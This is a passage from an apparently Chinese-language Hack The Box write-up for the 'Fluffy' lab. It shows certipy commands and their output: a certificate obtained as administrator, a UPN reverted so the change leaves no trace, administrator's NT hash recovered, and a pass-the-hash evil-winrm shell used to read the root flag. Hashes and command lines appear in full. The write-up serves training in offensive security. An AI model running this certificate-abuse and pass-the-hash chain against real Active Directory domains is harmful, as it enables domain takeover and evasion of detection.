Successfully requested certificate [*] Request ID is 24 [*] Got certificate with UPN 'administrator' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx' // 以 ca_svc 用户的身份和哈希,向 fluffy-DC01-CA 请求一个基于 User 模板的证书。 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : ca_svc@fluffy.htb [*] Successfully updated 'ca_svc' //在成功获取证书后,将 ca_svc 账户的 userPrincipalName (UPN) 属性恢复到其原始的 ca_svc@fluffy.htb,避免在 Active Directory 中留下可疑的 UPN 更改 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@fluffy.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e //使用刚刚获得的 administrator.pfx 证书,尝试以 administrator 用户的身份对 fluffy.htb 域进行身份验证。获取了 Administrator 用户的 NTLM 哈希 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# evil-winrm -i 10.10.11.69 -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt fbb4e8************************* *Evil-WinRM* PS C:\Users\Administrator\desktop> //得到rootflag
